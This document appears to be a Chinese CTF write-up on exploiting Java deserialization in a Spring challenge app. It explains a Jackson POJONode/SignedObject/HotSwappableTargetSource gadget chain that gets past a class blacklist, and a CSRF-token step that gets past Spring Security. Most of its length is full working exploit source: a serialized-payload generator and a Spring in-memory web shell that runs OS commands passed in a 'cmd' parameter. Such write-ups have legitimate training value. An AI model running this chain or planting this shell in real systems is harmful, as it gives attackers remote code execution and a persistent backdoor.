目录
step 0
step 1
step 2
step 3
题目本身是不难,简单复健一下
step 0
pom依赖就是spring
反序列化入口在./admin/user/readObj
输入流做了黑名单的过滤,TemplatesImpl不能直接打
可以jackson打SignedObject二次反序列化绕过
具体原理看下面这篇文章
【Web】浅聊Jackson序列化getter的利用——POJONode_jackson反序列化调用getter-CSDN博客
step 1
上面那篇文章其实唯一要我们去思考的点就是如何触发toString,方法很多,具体看下面这篇文章
【Web】浅聊Java反序列化之Rome——关于其他利用链-CSDN博客
javax.management被ban了,所以不能用javax.management.BadAttributeValueExpException作为入口
考虑到spring依赖,可以打HotSwappableTargetSource利用链,这里套两次就可
HashMap#readObject -> HashMap#putVal -> HotSwappableTargetSource#equals -> XString#equals
-> POJONode#toString -> SignedObject#getObject
-> HashMap#readObject -> HashMap#putVal -> HotSwappableTargetSource#equals -> XString#equals
-> TemplatesImpl#getOutputProperties
注意靶机不出网,所以考虑注内存马或打spring回显类
step 2
直接访问./admin/user/hello是可以直接绕过鉴权的
但若直接post传参会报403,原因是Spring Security默认会开启csrf验证,防止csrf攻击
./login随便输入内容尝试登录,会发现post中存在_csrf字段
所以我们打入payload时也要附带上_csrf和配套的JSESSIONID
step 3
EXP.java
package com.example.demo.exp;import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xpath.internal.objects.XString;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtMethod;
import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.HotSwappableTargetSource;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.security.*;
import java.util.Base64;
import java.util.HashMap;public class EXP {public static void main(String[] args) throws Exception {// 删除 BaseJsonNode#writeReplace 方法ClassPool pool = ClassPool.getDefault();CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");ctClass0.removeMethod(writeReplace);ctClass0.toClass();// 靶机不出网,打Spring内存马byte[] bytes = Repository.lookupClass(SpringMemShell.class).getBytes();Templates templatesImpl = new TemplatesImpl();setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});setFieldValue(templatesImpl, "_name", "xxx");setFieldValue(templatesImpl, "_tfactory", null);// 内层 HashMap#readObject -> TemplatesImpl#getTransletInstancePOJONode inJsonNodes = new POJONode(makeTemplatesImplAopProxy(templatesImpl));HotSwappableTargetSource inHotSwappableTargetSource1 = new HotSwappableTargetSource(inJsonNodes);HotSwappableTargetSource inHotSwappableTargetSource2 = new HotSwappableTargetSource(new XString("xxx"));HashMap inHashMap = makeMap(inHotSwappableTargetSource1, inHotSwappableTargetSource2);// SignedObject#getObject -> 内层 HashMap#readObjectKeyPairGenerator keyPairGenerator;keyPairGenerator = KeyPairGenerator.getInstance("DSA");keyPairGenerator.initialize(1024);KeyPair keyPair = keyPairGenerator.genKeyPair();PrivateKey privateKey = keyPair.getPrivate();Signature signingEngine = Signature.getInstance("DSA");SignedObject signedObject = new SignedObject(inHashMap, privateKey, signingEngine);// 外层 HashMap#readObject -> SignedObject#getObjectPOJONode jsonNodes = new POJONode(signedObject);HotSwappableTargetSource hotSwappableTargetSource1 = new HotSwappableTargetSource(jsonNodes);HotSwappableTargetSource hotSwappableTargetSource2 = new HotSwappableTargetSource(new XString("xxx"));HashMap hashMap = makeMap(hotSwappableTargetSource1, hotSwappableTargetSource2);// 序列化外层 HashMap#readObjectByteArrayOutputStream barr = new ByteArrayOutputStream();ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);objectOutputStream.writeObject(hashMap);objectOutputStream.close();String res = Base64.getEncoder().encodeToString(barr.toByteArray());System.out.println(res);}// 解决 jackson 链不稳定性问题(当然,如果运气好,不用它也行)public static Object makeTemplatesImplAopProxy(Templates templates) throws Exception {AdvisedSupport advisedSupport = new AdvisedSupport();advisedSupport.setTarget(templates);Constructor constructor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy").getConstructor(AdvisedSupport.class);constructor.setAccessible(true);InvocationHandler handler = (InvocationHandler) constructor.newInstance(advisedSupport);Object proxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{Templates.class}, handler);return proxy;}private static void setFieldValue(Object obj, String field, Object arg) throws Exception{Field f = obj.getClass().getDeclaredField(field);f.setAccessible(true);f.set(obj, arg);}public static HashMap<Object, Object> makeMap (Object v1, Object v2 ) throws Exception {HashMap<Object, Object> s = new HashMap<>();setFieldValue(s, "size", 2);Class<?> nodeC;try {nodeC = Class.forName("java.util.HashMap$Node");}catch ( ClassNotFoundException e ) {nodeC = Class.forName("java.util.HashMap$Entry");}Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl = Array.newInstance(nodeC, 2);Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));setFieldValue(s, "table", tbl);return s;}
}
SpringMemShell.java
package com.example.demo.exp;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Scanner;public class SpringMemShell extends AbstractTranslet{static {try {WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");configField.setAccessible(true);RequestMappingInfo.BuilderConfiguration config =(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);Method method2 = SpringMemShell.class.getMethod("shell", HttpServletRequest.class, HttpServletResponse.class);RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();RequestMappingInfo info = RequestMappingInfo.paths("/shell").options(config).build();SpringMemShell springControllerMemShell = new SpringMemShell();mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);} catch (Exception hi) {
// hi.printStackTrace();}}public void shell(HttpServletRequest request, HttpServletResponse response) throws IOException {if (request.getParameter("cmd") != null) {boolean isLinux = true;String osTyp = System.getProperty("os.name");if (osTyp != null && osTyp.toLowerCase().contains("win")) {isLinux = false;}String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();Scanner s = new Scanner(in).useDelimiter("\\A");String output = s.hasNext() ? s.next() : "";response.getWriter().write(output);response.getWriter().flush();}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}
}
url一次编码后在./admin/user/readObj打入payload
成功写入内存马,命令执行拿flag
)
)
